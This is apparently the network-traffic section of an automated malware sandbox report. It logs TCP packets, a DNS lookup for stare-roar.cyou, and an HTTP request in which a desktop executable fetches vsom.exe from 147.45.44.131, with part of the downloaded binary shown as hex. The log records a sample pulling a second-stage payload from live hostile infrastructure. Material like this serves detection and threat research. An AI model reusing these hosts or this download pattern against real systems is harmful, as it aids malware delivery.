Dec 11, 2024 10:45:01.217789888 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.217830896 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.217844009 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.219001055 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.219043016 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.219073057 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.220088005 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.220140934 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.220144033 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.221712112 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.221746922 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.221849918 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.223381042 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.223421097 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.223536015 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.225087881 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.225126028 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.225193977 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.226852894 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.226891994 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.226943016 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.228477955 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.228518963 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.228604078 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.230158091 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.230206013 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.230257034 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.231870890 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.231913090 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.231985092 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.233550072 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.233591080 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.233891010 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.235253096 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.235304117 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.235347033 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.236941099 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.236988068 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.237150908 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.238656044 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.238706112 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.238848925 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.240336895 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.240390062 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.240417957 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.242038012 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.242084980 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.242147923 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.243771076 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.243822098 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.243912935 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.245425940 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.245476961 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.245522022 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.247136116 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.247184038 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.247217894 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.248864889 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.248902082 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.248963118 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.250570059 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.250612020 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.250648022 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.252232075 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.252278090 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.252316952 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.253941059 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.253988981 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.254033089 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.255785942 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.255892992 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.362404108 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.362495899 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.362550020 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.363195896 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.363301992 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.363894939 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.364568949 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.365154028 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.365195990 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.365253925 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.366637945 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.366684914 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.366740942 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.368122101 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.368164062 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.368199110 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.416491032 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.947351933 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:02.500262022 CET	49707	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:02.500294924 CET	443	49707	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:02.500402927 CET	49707	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:02.503930092 CET	49707	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:02.503946066 CET	443	49707	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:03.721445084 CET	443	49707	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:03.721510887 CET	49707	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:03.725302935 CET	49707	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:03.725316048 CET	443	49707	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:03.725656033 CET	443	49707	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:03.775883913 CET	49707	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:03.790359974 CET	49707	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:03.790389061 CET	49707	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:03.790498018 CET	443	49707	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:04.422190905 CET	443	49707	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:04.422297955 CET	443	49707	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:04.422415018 CET	49707	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:04.427687883 CET	49707	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:04.427704096 CET	443	49707	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:04.539092064 CET	49708	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:04.539138079 CET	443	49708	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:04.542186022 CET	49708	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:04.542567968 CET	49708	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:04.542583942 CET	443	49708	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:05.753536940 CET	443	49708	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:05.753648043 CET	49708	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:05.755002022 CET	49708	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:05.755011082 CET	443	49708	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:05.755259037 CET	443	49708	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:05.756536007 CET	49708	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:05.756556988 CET	49708	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:05.756606102 CET	443	49708	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:06.477391958 CET	443	49708	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:06.477885962 CET	443	49708	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:06.477920055 CET	443	49708	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:06.477943897 CET	49708	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:06.477957964 CET	443	49708	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:06.478007078 CET	49708	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:06.478245020 CET	443	49708	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:06.478321075 CET	443	49708	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:06.478365898 CET	49708	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:06.478374004 CET	443	49708	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:06.494021893 CET	443	49708	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:06.494055033 CET	443	49708	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:06.494091988 CET	49708	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:06.494110107 CET	443	49708	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:06.494182110 CET	49708	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:06.502336025 CET	443	49708	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:06.557178974 CET	49708	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:06.597156048 CET	443	49708	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:06.650911093 CET	49708	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:06.670471907 CET	443	49708	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:06.674177885 CET	443	49708	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:06.674267054 CET	49708	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:06.674273968 CET	443	49708	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:06.674326897 CET	49708	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:06.677834988 CET	49708	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:06.677858114 CET	443	49708	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:06.677870989 CET	49708	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:06.677876949 CET	443	49708	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:06.704268932 CET	49709	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:06.704340935 CET	443	49709	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:06.704484940 CET	49709	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:06.704866886 CET	49709	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:06.704891920 CET	443	49709	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:07.915692091 CET	443	49709	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:07.915802956 CET	49709	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:07.917239904 CET	49709	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:07.917252064 CET	443	49709	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:07.917491913 CET	443	49709	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:07.918765068 CET	49709	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:07.918925047 CET	49709	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:07.918952942 CET	443	49709	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:08.608258963 CET	443	49709	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:08.608371973 CET	443	49709	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:08.608434916 CET	49709	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:08.608613968 CET	49709	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:08.608639002 CET	443	49709	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:08.625329971 CET	49710	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:08.625366926 CET	443	49710	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:08.625473022 CET	49710	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:08.625796080 CET	49710	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:08.625813007 CET	443	49710	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:09.842168093 CET	443	49710	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:09.842338085 CET	49710	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:09.843645096 CET	49710	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:09.843653917 CET	443	49710	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:09.843985081 CET	443	49710	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:09.845216036 CET	49710	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:09.845395088 CET	49710	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:09.845453978 CET	443	49710	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:09.845566034 CET	49710	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:09.891331911 CET	443	49710	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:10.674534082 CET	443	49710	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:10.674628973 CET	443	49710	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:10.674694061 CET	49710	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:10.674880028 CET	49710	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:10.674901009 CET	443	49710	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:10.809889078 CET	49711	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:10.809958935 CET	443	49711	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:10.810067892 CET	49711	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:10.810471058 CET	49711	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:10.810484886 CET	443	49711	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:12.022130966 CET	443	49711	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:12.022253990 CET	49711	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:12.023514032 CET	49711	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:12.023550987 CET	443	49711	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:12.023806095 CET	443	49711	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:12.025054932 CET	49711	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:12.025192022 CET	49711	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:12.025228024 CET	443	49711	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:12.025279999 CET	49711	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:12.025293112 CET	443	49711	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:12.931551933 CET	443	49711	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:12.931652069 CET	443	49711	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:12.931756973 CET	49711	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:12.932147980 CET	49711	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:12.932163954 CET	443	49711	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:13.046494961 CET	49712	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:13.046545029 CET	443	49712	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:13.046674967 CET	49712	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:13.046968937 CET	49712	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:13.046982050 CET	443	49712	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:14.263245106 CET	443	49712	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:14.263319969 CET	49712	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:14.265322924 CET	49712	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:14.265332937 CET	443	49712	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:14.265598059 CET	443	49712	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:14.267111063 CET	49712	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:14.267203093 CET	49712	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:14.267210007 CET	443	49712	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:14.988163948 CET	443	49712	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:14.988290071 CET	443	49712	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:14.988358974 CET	49712	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:14.999072075 CET	49712	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:14.999102116 CET	443	49712	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:15.664808035 CET	49713	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:15.664860964 CET	443	49713	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:15.664947033 CET	49713	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:15.665251017 CET	49713	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:15.665263891 CET	443	49713	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:16.879239082 CET	443	49713	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:16.879410028 CET	49713	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:16.880734921 CET	49713	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:16.880747080 CET	443	49713	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:16.880992889 CET	443	49713	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:16.883802891 CET	49713	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:16.884665966 CET	49713	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:16.884692907 CET	443	49713	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:16.884805918 CET	49713	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:16.884838104 CET	443	49713	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:16.885469913 CET	49713	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:16.885498047 CET	443	49713	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:16.888313055 CET	49713	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:16.888341904 CET	443	49713	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:16.892324924 CET	49713	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:16.892364025 CET	443	49713	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:16.896317005 CET	49713	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:16.896354914 CET	443	49713	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:16.896367073 CET	49713	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:16.896373034 CET	443	49713	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:16.896513939 CET	49713	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:16.896541119 CET	443	49713	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:16.896564007 CET	49713	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:16.896702051 CET	49713	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:16.896740913 CET	49713	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:16.943330050 CET	443	49713	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:16.944405079 CET	49713	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:16.944448948 CET	443	49713	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:16.944472075 CET	49713	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:16.944489002 CET	443	49713	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:16.944536924 CET	49713	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:16.944555044 CET	443	49713	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:16.944581985 CET	49713	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:16.944593906 CET	443	49713	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:16.944602013 CET	49713	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:16.944607973 CET	443	49713	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:20.761346102 CET	443	49713	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:20.761446953 CET	443	49713	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:20.761502028 CET	49713	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:20.763058901 CET	49713	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:20.763077021 CET	443	49713	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:20.774914026 CET	49715	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:20.774944067 CET	443	49715	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:20.775007963 CET	49715	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:20.775906086 CET	49715	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:20.775917053 CET	443	49715	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:21.999145985 CET	443	49715	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:21.999224901 CET	49715	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:22.001337051 CET	49715	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:22.001349926 CET	443	49715	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:22.001662970 CET	443	49715	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:22.003180027 CET	49715	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:22.003196001 CET	49715	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:22.003268003 CET	443	49715	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:22.736579895 CET	443	49715	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:22.736691952 CET	443	49715	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:22.736865997 CET	49715	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:22.737021923 CET	49715	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:22.737041950 CET	443	49715	104.21.78.149	192.168.2.8
Dec 11, 2024 10:45:22.737068892 CET	49715	443	192.168.2.8	104.21.78.149
Dec 11, 2024 10:45:22.737075090 CET	443	49715	104.21.78.149	192.168.2.8

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 11, 2024 10:45:02.025542974 CET	51410	53	192.168.2.8	1.1.1.1
Dec 11, 2024 10:45:02.494117022 CET	53	51410	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 11, 2024 10:45:02.025542974 CET	192.168.2.8	1.1.1.1	0x600d	Standard query (0)	stare-roar.cyou	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 11, 2024 10:45:02.494117022 CET	1.1.1.1	192.168.2.8	0x600d	No error (0)	stare-roar.cyou		104.21.78.149	A (IP address)	IN (0x0001)	false
Dec 11, 2024 10:45:02.494117022 CET	1.1.1.1	192.168.2.8	0x600d	No error (0)	stare-roar.cyou		172.67.223.80	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

stare-roar.cyou

147.45.44.131

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49706	147.45.44.131	80	7492	C:\Users\user\Desktop\EBUdultKh7.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 10:44:59.135669947 CET	180	OUT	GET /infopage/vsom.exe HTTP/1.1 X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq Host: 147.45.44.131 Connection: Keep-Alive
Dec 11, 2024 10:45:00.402662992 CET	1236	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 09:45:00 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Fri, 29 Nov 2024 16:14:55 GMT ETag: "4b400-6280f7fe39e37" Accept-Ranges: bytes Content-Length: 308224 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 05 00 0d 33 47 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 f8 03 00 00 b8 00 00 00 00 00 00 f0 9c 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 dd 2b 04 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 05 00 e8 3d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 2d [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL3Gg@@+P=(-.text `.rdata "@@.data@V@.CRT@t@@.reloc=P>v@B
Dec 11, 2024 10:45:00.402770996 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: D$t(8uxuxuD$D$jP1USWV \|$81t$4.]S't%E.]SEu
